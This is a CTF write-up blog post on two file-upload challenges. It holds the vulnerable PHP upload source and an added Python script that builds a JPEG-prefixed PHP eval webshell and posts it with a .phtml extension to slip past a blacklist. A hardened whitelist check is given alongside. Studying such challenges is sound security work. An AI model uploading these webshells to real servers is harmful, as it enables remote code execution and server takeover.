BUUCTF File Upload

[WUSTCTF2020]CV Maker

Topic: file upload

Solution

1. Register, log in, and upload an "image webshell" (an image file with a PHP one-liner appended). Intercept the request in Burp Suite, change the extension in filename= to .php, then connect to it with AntSword (蚁剑).

[ACTF2020 新生赛]Upload (file upload: front-end JS validation & blacklist bypass)

1. Press F12 and delete onsubmit="return checkFile()" from the form to bypass the client-side check.
2. A .php file is still refused, so the back end most likely blacklists the php extension.
Upload a one-line webshell, intercept with Burp Suite, change the extension in filename= to .phtml, and connect with AntSword. The response echoes the stored path, so the md5-renamed file is easy to find.
Finally, the challenge source:

<?php
    error_reporting(0);
    // set the upload directory
    define("UPLOAD_PATH", "./uplo4d");
    $msg = "Upload Success!";
    if (isset($_POST['submit'])) {
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $file_name = $_FILES['upload_file']['name'];
        // extension = text after the last dot of the client-supplied filename
        $ext = pathinfo($file_name, PATHINFO_EXTENSION);
        // blacklist: exact, case-sensitive match, and .phtml is not on it
        if (in_array($ext, ['php', 'php3', 'php4', 'php5'])) {
            exit('nonono~ Bad file!');
        }

        // stored name is md5(original name) plus the original extension
        $new_file_name = md5($file_name) . "." . $ext;
        $img_path = UPLOAD_PATH . '/' . $new_file_name;

        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = 'Upload Failed!';
        }
        // the final path is echoed back, so the uploaded shell is easy to locate
        echo '<div style="color:#F00">' . $msg . " Look here~ " . $img_path . "</div>";
    }
?>
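The following is an added example, not code from the original write-up or from either challenge. It ports the extension check from the PHP source above to Python so the bypass can be reasoned about offline, puts a hardened whitelist check next to it, builds the multipart/form-data request with an arbitrary filename (the same edit made to filename= in Burp for both CV Maker and ACTF Upload), and can optionally POST it. The form field names (upload_file, submit) come from the source above; the JPEG-prefixed "image webshell", the whitelist contents and the target URL argument are assumptions.

```python
"""Added example (not from the original write-up): the challenge's extension
check ported from the PHP source, a hardened whitelist beside it, and the
multipart request edit that Burp performs on filename=."""
import secrets
import sys
import urllib.request

# Blacklist copied from the challenge source. PHP's in_array() compares the
# raw extension string, so the match is exact and case-sensitive.
BLACKLIST = ['php', 'php3', 'php4', 'php5']
# Hypothetical whitelist for the hardened variant (assumption, not the challenge).
WHITELIST = {'jpg', 'jpeg', 'png', 'gif'}


def ext_of(filename):
    """Mimic pathinfo($name, PATHINFO_EXTENSION): the text after the last dot
    of the basename, or '' when there is no dot."""
    base = filename.rsplit('/', 1)[-1]
    return base.rsplit('.', 1)[1] if '.' in base else ''


def blacklist_allows(filename):
    """The challenge's check: rejected only when the extension is exactly listed."""
    return ext_of(filename) not in BLACKLIST


def whitelist_allows(filename):
    """Hardened check: normalise case and accept only known image extensions."""
    return ext_of(filename).lower() in WHITELIST


def image_shell(payload=b'<?php eval($_POST["a"]); ?>'):
    """A minimal 'image webshell' (constructed sample): JPEG magic bytes followed
    by a one-line shell, so a naive magic-byte check still sees a picture."""
    return b'\xff\xd8\xff\xe0' + payload


def build_multipart(filename, content, field='upload_file', boundary=None):
    """Build the multipart/form-data body a browser would send, with the
    filename we choose. This is the edit made to filename= in Burp."""
    boundary = boundary or 'bnd' + secrets.token_hex(8)
    body = (
        f'--{boundary}\r\n'
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f'Content-Type: image/jpeg\r\n\r\n'
    ).encode() + content + b'\r\n'
    body += (f'--{boundary}\r\nContent-Disposition: form-data; name="submit"\r\n\r\n'
             ).encode() + b'upload\r\n'
    body += f'--{boundary}--\r\n'.encode()
    headers = {
        'Content-Type': f'multipart/form-data; boundary={boundary}',
        'Content-Length': str(len(body)),
    }
    return headers, body


def post(url, headers, body):
    """Send the crafted request; the challenge echoes the stored path back."""
    req = urllib.request.Request(url, data=body, headers=headers, method='POST')
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors='replace')


if __name__ == '__main__':
    for name in ['shell.php', 'shell.phtml', 'shell.PHP', 'cv.jpg']:
        print(f'{name:12} blacklist_allows={blacklist_allows(name)!s:5} '
              f'whitelist_allows={whitelist_allows(name)}')
    headers, body = build_multipart('shell.phtml', image_shell())
    print(body.decode(errors='replace'))
    if len(sys.argv) > 1:  # python3 upload.py http://target/upload.php (assumed URL)
        print(post(sys.argv[1], headers, body))
```

Two caveats worth keeping in mind: .phtml only yields code execution because the server's PHP handler mapping treats it as PHP (Debian-family Apache packages match `.ph(ar|p|tml)` by default), and shell.PHP slips past in_array() for the same case-sensitivity reason but is only executed if the handler mapping is case-insensitive. The whitelist variant rejects both, which is why extension checks should be allow-lists after case normalisation rather than deny-lists.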
posted @ 2020-12-08 17:56  Pur3